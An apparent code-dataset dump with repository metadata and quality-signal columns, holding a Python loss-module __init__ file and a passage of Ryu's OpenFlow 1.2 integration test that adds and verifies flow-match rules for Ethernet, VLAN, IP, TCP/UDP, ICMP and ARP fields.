hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
53eb0bb4ff846eb7cbffee069987194135195bdf | 514 | py | Python | src/losses/__init__.py | N1kYan/vssil | 214363f1a924414415cfef940404d8057f6912e7 | [
"MIT"
] | null | null | null | src/losses/__init__.py | N1kYan/vssil | 214363f1a924414415cfef940404d8057f6912e7 | [
"MIT"
] | null | null | null | src/losses/__init__.py | N1kYan/vssil | 214363f1a924414415cfef940404d8057f6912e7 | [
"MIT"
] | null | null | null | from .temporal_separation_loss import temporal_separation_loss
from .perception_encoding_loss import perception_loss
from .spatial_consistency_loss import spatial_consistency_loss
from .time_contrastive_loss import time_contrastive_triplet_loss
from .pixelwise_contrastive_loss_v3 import pixelwise_contrastive_loss_patch_based
from .pixelwise_contrastive_loss_v4 import pixelwise_contrastive_loss_fmap_based
from .pixelwise_contrastive_loss_v6 import pwcl
from .pixelwise_contrastive_loss_v7 import pwcl as pwcl2
| 51.4 | 81 | 0.916342 | 70 | 514 | 6.214286 | 0.328571 | 0.241379 | 0.331034 | 0.257471 | 0.151724 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010438 | 0.068093 | 514 | 9 | 82 | 57.111111 | 0.897704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
53efe7db216ad385dabb5ea67288b8747bf74809 | 39,247 | py | Python | ryu/tests/integrated/test_add_flow_v12_matches.py | t-lin/ryu | 34ed41cc4149a4c5789d06b66ec13533ab51652a | [
"Apache-2.0"
] | 1 | 2020-01-19T04:50:17.000Z | 2020-01-19T04:50:17.000Z | ryu/tests/integrated/test_add_flow_v12_matches.py | t-lin/ryu | 34ed41cc4149a4c5789d06b66ec13533ab51652a | [
"Apache-2.0"
] | null | null | null | ryu/tests/integrated/test_add_flow_v12_matches.py | t-lin/ryu | 34ed41cc4149a4c5789d06b66ec13533ab51652a | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import logging
import itertools
from ryu.ofproto import ofproto_v1_2
from ryu.ofproto import ether
from ryu.ofproto import inet
from ryu.tests.integrated import tester
LOG = logging.getLogger(__name__)
class RunTest(tester.TestFlowBase):
""" Test case for add flows of Matches
"""
OFP_VERSIONS = [ofproto_v1_2.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(RunTest, self).__init__(*args, **kwargs)
self._verify = []
def add_matches(self, dp, match):
m = dp.ofproto_parser.OFPFlowMod(dp, 0, 0, 0,
dp.ofproto.OFPFC_ADD,
0, 0, 0, 0xffffffff,
dp.ofproto.OFPP_ANY,
0xffffffff, 0, match, [])
dp.send_msg(m)
def verify_default(self, dp, stats):
verify = self._verify
self._verify = []
headers = value = mask = None
if len(verify) == 3:
(headers, value, mask, ) = verify
else:
return "self._verify is invalid."
f_value = f_mask = None
for f in stats[0].match.fields:
if f.header in headers:
f_value = f.value
if len(headers) == 2:
f_mask = f.mask
break
if f_value == value and f_mask == mask:
return True
elif value == None:
return "Field[%s] is setting." % (headers, )
else:
return "Value error. send: (%s/%s), val:(%s/%s)" \
% (value, mask, f_value, f_mask)
def test_rule_set_dl_dst(self, dp):
dl_dst = 'e2:7a:09:79:0b:0f'
dl_dst_bin = self.haddr_to_bin(dl_dst)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
dl_dst_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst(dl_dst_bin)
self.add_matches(dp, match)
def test_rule_set_dl_dst_masked_ff(self, dp):
dl_dst = 'd0:98:79:b4:75:b5'
dl_dst_bin = self.haddr_to_bin(dl_dst)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
dl_dst_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst_masked(dl_dst_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_dst_masked_f0(self, dp):
dl_dst = 'e2:7a:09:79:0b:0f'
dl_dst_bin = self.haddr_to_bin(dl_dst)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
dl_dst_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst_masked(dl_dst_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_dst_masked_00(self, dp):
dl_dst = 'e2:7a:09:79:0b:0f'
dl_dst_bin = self.haddr_to_bin(dl_dst)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst_masked(dl_dst_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
dl_src_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src(dl_src_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src_masked_ff(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
dl_src_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src_masked(dl_src_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src_masked_f0(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
dl_src_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src_masked(dl_src_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src_masked_00(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src_masked(dl_src_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_type_ip(self, dp):
dl_type = ether.ETH_TYPE_IP
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_arp(self, dp):
dl_type = ether.ETH_TYPE_ARP
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_vlan(self, dp):
dl_type = ether.ETH_TYPE_8021Q
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_ipv6(self, dp):
dl_type = ether.ETH_TYPE_IPV6
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_lacp(self, dp):
dl_type = ether.ETH_TYPE_SLOW
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_ip_dscp(self, dp):
ip_dscp = 36
dl_type = ether.ETH_TYPE_IP
self._verify = [(dp.ofproto.OXM_OF_IP_DSCP, ),
ip_dscp, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_dscp(ip_dscp)
self.add_matches(dp, match)
def test_rule_set_vlan_vid(self, dp):
vlan_vid = 0x4ef
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
vlan_vid, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid(vlan_vid)
self.add_matches(dp, match)
def test_rule_set_vlan_vid_masked_ff(self, dp):
vlan_vid = 0x4ef
mask = 0xfff
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
vlan_vid, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid_masked(vlan_vid, mask)
self.add_matches(dp, match)
def test_rule_set_vlan_vid_masked_f0(self, dp):
vlan_vid = 0x4ef
mask = 0xff0
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
vlan_vid & mask, mask]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid_masked(vlan_vid, mask)
self.add_matches(dp, match)
def test_rule_set_vlan_vid_masked_00(self, dp):
vlan_vid = 0x4ef
mask = 0x000
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid_masked(vlan_vid, mask)
self.add_matches(dp, match)
def test_rule_set_vlan_pcp(self, dp):
vlan_vid = 0x4ef
vlan_pcp = 5
self._verify = [(dp.ofproto.OXM_OF_VLAN_PCP, ),
vlan_pcp, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid(vlan_vid)
match.set_vlan_pcp(vlan_pcp)
self.add_matches(dp, match)
def test_rule_set_ip_ecn(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_ecn = 3
self._verify = [(dp.ofproto.OXM_OF_IP_ECN, ),
ip_ecn, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_ecn(ip_ecn)
self.add_matches(dp, match)
def test_rule_set_ip_proto_icmp(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_ICMP
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_tcp(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_TCP
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_udp(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_UDP
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_route(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ROUTING
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_frag(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_FRAGMENT
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_icmp(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ICMPV6
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_none(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_NONE
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_dstopts(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_DSTOPTS
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ipv4_src(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src(src_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_src_masked_32(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src_masked(src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_src_masked_24(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
src_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src_masked(src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_src_masked_0(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src_masked(src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst(dst_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst_masked_32(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst_masked(dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst_masked_24(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
dst_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst_masked(dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst_masked_0(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst_masked(dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_tcp_src(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_TCP
tp_src = 1103
self._verify = [(dp.ofproto.OXM_OF_TCP_SRC, ),
tp_src, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_tcp_src(tp_src)
self.add_matches(dp, match)
def test_rule_set_tcp_dst(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_TCP
tp_dst = 236
self._verify = [(dp.ofproto.OXM_OF_TCP_DST, ),
tp_dst, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_tcp_dst(tp_dst)
self.add_matches(dp, match)
def test_rule_set_udp_src(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_UDP
tp_src = 56617
self._verify = [(dp.ofproto.OXM_OF_UDP_SRC, ),
tp_src, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_udp_src(tp_src)
self.add_matches(dp, match)
def test_rule_set_udp_dst(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_UDP
tp_dst = 61278
self._verify = [(dp.ofproto.OXM_OF_UDP_DST, ),
tp_dst, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_udp_dst(tp_dst)
self.add_matches(dp, match)
def test_rule_set_icmpv4_type(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_ICMP
icmp_type = 8
self._verify = [(dp.ofproto.OXM_OF_ICMPV4_TYPE, ),
icmp_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv4_type(icmp_type)
self.add_matches(dp, match)
def test_rule_set_icmpv4_code(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_ICMP
icmp_type = 9
icmp_code = 16
self._verify = [(dp.ofproto.OXM_OF_ICMPV4_CODE, ),
icmp_code, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv4_type(icmp_type)
match.set_icmpv4_code(icmp_code)
self.add_matches(dp, match)
def test_rule_set_arp_opcode(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_op = 1
self._verify = [(dp.ofproto.OXM_OF_ARP_OP, ),
arp_op, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_opcode(arp_op)
self.add_matches(dp, match)
def test_rule_set_arp_spa(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
nw_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa(nw_src_int)
self.add_matches(dp, match)
def test_rule_set_arp_spa_masked_32(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
nw_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa_masked(nw_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_spa_masked_24(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
nw_src_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa_masked(nw_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_spa_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa_masked(nw_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
nw_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa(nw_dst_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa_masked_32(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
nw_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa_masked(nw_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa_masked_24(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
nw_dst_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa_masked(nw_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa_masked(nw_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_sha(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
